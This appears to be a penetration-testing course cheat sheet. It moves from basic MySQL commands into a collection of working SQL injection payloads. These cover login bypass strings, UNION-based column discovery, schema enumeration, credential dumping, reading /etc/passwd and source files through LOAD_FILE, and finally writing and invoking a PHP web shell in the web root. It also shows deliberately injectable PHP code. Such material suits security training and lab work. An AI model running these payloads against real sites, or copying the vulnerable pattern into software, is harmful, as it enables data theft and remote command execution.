๐๏ธMySQL
code
mysql -h 10.10.14.49 -u username -pPassw0rdIt is also possible the password directly into the command, though this should be avoided, as it could lead to the password being kept in logs and terminal history:
mysql -u <username> -p<password> Tip: There shouldn't be any spaces between '-p' and the password.
mysql -u <username> -h <host> -P <port> -p
CREATE DATABASE users;
SHOW DATABASES;
USE users; database name is case sensitive
CREATE TABLE logins (
id INT,
username VARCHAR(100),
password VARCHAR(100),
date_of_joining DATETIME
);SHOW TABLES;
DESCRIBE logins;
id INT NOT NULL AUTO_INCREMENT,username VARCHAR(100) UNIQUE NOT NULL,date_of_joining DATETIME DEFAULT NOW(),PRIMARY KEY (id)CREATE TABLE logins (
id INT NOT NULL AUTO_INCREMENT,
username VARCHAR(100) UNIQUE NOT NULL,
password VARCHAR(100) NOT NULL,
date_of_joining DATETIME DEFAULT NOW(),
PRIMARY KEY (id)
);INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);Skipping inserting default values for the columns
INSERT INTO table_name(column2, column3, ...) VALUES (column2_value, column3_value, ...);SELECT * FROM table_name;SELECT column1, column2 FROM table_name;DROP TABLE logins;ALTER TABLE logins ADD newColumn INT;ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;ALTER TABLE logins MODIFY oldColumn DATE;ALTER TABLE logins DROP oldColumn;UPDATE table_name SET column1=newvalue1, column2=newvalue2, ... WHERE <condition>;UPDATE logins SET password = 'change_password' WHERE id > 1;Query
SELECT * FROM logins ORDER BY password;SELECT * FROM logins ORDER BY password DESC;SELECT * FROM logins ORDER BY password DESC, id ASC;SELECT * FROM logins LIMIT 2;SELECT * FROM logins LIMIT 1, 2;SELECT * FROM table_name WHERE <condition>;SELECT * FROM logins WHERE id > 1;SELECT * FROM logins where username = 'admin';Note: String and date data types should be surrounded by single quote (') or double quotes ("), while numbers can be used directly.
SELECT * FROM logins WHERE username LIKE 'admin%';The % symbol acts as a wildcard and matches all characters after admin.
SELECT * FROM logins WHERE username like '___';The _ symbol is used to match exactly one character.
SQL Operators
mysql> SELECT 1 = 1 AND 'test' = 'test';
+---------------------------+
| 1 = 1 AND 'test' = 'test' |
+---------------------------+
| 1 |
+---------------------------+
1 row in set (0.00 sec)
mysql> SELECT 1 = 1 AND 'test' = 'abc';
+--------------------------+
| 1 = 1 AND 'test' = 'abc' |
+--------------------------+
| 0 |
+--------------------------+
1 row in set (0.00 sec)In MySQL terms, any non-zero value is considered true, and it usually returns the value 1 to signify true. 0 is considered false.
mysql> SELECT 1 = 1 OR 'test' = 'abc';
+-------------------------+
| 1 = 1 OR 'test' = 'abc' |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)
mysql> SELECT 1 = 2 OR 'test' = 'abc';
+-------------------------+
| 1 = 2 OR 'test' = 'abc' |
+-------------------------+
| 0 |
+-------------------------+
1 row in set (0.00 sec)mysql> SELECT NOT 1 = 1;
+-----------+
| NOT 1 = 1 |
+-----------+
| 0 |
+-----------+
1 row in set (0.00 sec)
mysql> SELECT NOT 1 = 2;
+-----------+
| NOT 1 = 2 |
+-----------+
| 1 |
+-----------+
1 row in set (0.00 sec)The AND, OR and NOT operators can also be represented as &&, || and !, respectively.
SQL Injections
$conn = new mysqli("localhost", "root", "password", "users");
$query = "select * from logins";
$result = $conn->query($query);while($row = $result->fetch_assoc() ){
echo $row["name"]."<br>";
}$searchInput = $_POST['findUser'];
$query = "select * from logins where username like '%$searchInput'";
$result = $conn->query($query);For example, if we search for 1'; DROP TABLE users;, the search input would be:
'%1'; DROP TABLE users;'select * from logins where username like '%1'; DROP TABLE users;'SQLi Discovery
'
%27
"
%22
#
%23
;
%3B
)
%29
SELECT * FROM logins WHERE username=''' AND password = 'something';admin' or '1'='1SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something'; something' or '1'='1SELECT * FROM logins WHERE username='NotAdmin' or '1'='1' AND password = 'something' or '1'='1';Comments
We can use two types of line comments with MySQL -- and #
SELECT * FROM logins WHERE username = 'admin'; # You can place anything here AND password = 'something'In order to use (#) as a comment within a browser, we can use '%23', which is an URL encoded (#) symbol.
SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something';admin')--SELECT * FROM logins where (username='admin')Union
SELECT * FROM ports UNION SELECT * FROM ships;SELECT * from products where product_id = '1' UNION SELECT username, password from passwords-- 'Tip: For advanced SQL injection, we may want to simply use 'NULL' to fill other columns, as 'NULL' fits all data types.
SELECT * from products where product_id = '1' UNION SELECT username, 2 from passwordsSELECT * from products where product_id UNION SELECT username, 2, 3, 4 from passwords-- 'Detect Number of Columns
Using
ORDER BYUsing
UNION
' order by 1-- -http://SERVER_IP:PORT/search.php?port_code=' order by 1-- -
cn' UNION select 1,2,3-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,2,3-- -
cn' UNION select 1,@@version,3,4-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,@@version,3,4-- -
Database Enumeration
MySQL Fingerprinting
SELECT @@version
When we have full query output
MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1'
In MSSQL it returns MSSQL version. Error with other DBMS.
SELECT POW(1,1)
When we only have numeric output
1
Error with other DBMS
SELECT SLEEP(5)
Blind/No Output
Delays page response for 5 seconds and returns 0.
Will not delay response with other DBMS
INFORMATION_SCHEMA Database
SELECT * FROM my_database.users;SCHEMATA
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
cn' UNION select 1,database(),2,3-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,database(),2,3-- -
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Data
cn' UNION select 1, username, password, 4 from dev.credentials-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1, username, password, 4 from dev.credentials-- -
Reading Files
DB User
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.usercn' UNION SELECT 1, user(), 3, 4-- -cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, user(), 3, 4-- -
SELECT super_priv FROM mysql.usercn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
SELECT sql_grants FROM information_schema.sql_show_grantscn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
LOAD_FILE
SELECT LOAD_FILE('/etc/passwd');Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4-- -
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, LOAD_FILE('/var/www/html/search.php'), 3, 4-- -
Writing Files
secure_file_priv
SHOW VARIABLES LIKE 'secure_file_priv';SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name='secure_file_priv'-- -
SELECT INTO OUTFILE
SELECT * from users INTO OUTFILE '/tmp/credentials';cat /tmp/credentials SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';cat /tmp/test.txt Writing Files through SQL Injection
select 'file written successfully!' into outfile '/var/www/html/proof.txt'LOAD_FILE
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
%WinDir%\System32\Inetsrv\Config\ApplicationHost.config
Reference:
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -http://SERVER_IP:PORT/search.php?port_code=cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
http://SERVER_IP:PORT/proof.txt
Writing a Web Shell
<?php system($_REQUEST[0]); ?>cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -http://SERVER_IP:PORT/search.php?port_code=cn' union select โ โ,'', โ โ, โ โ into outfile '/var/www/html/shell.php'-- -
http://SERVER_IP:PORT/shell.php?0=id
Last updated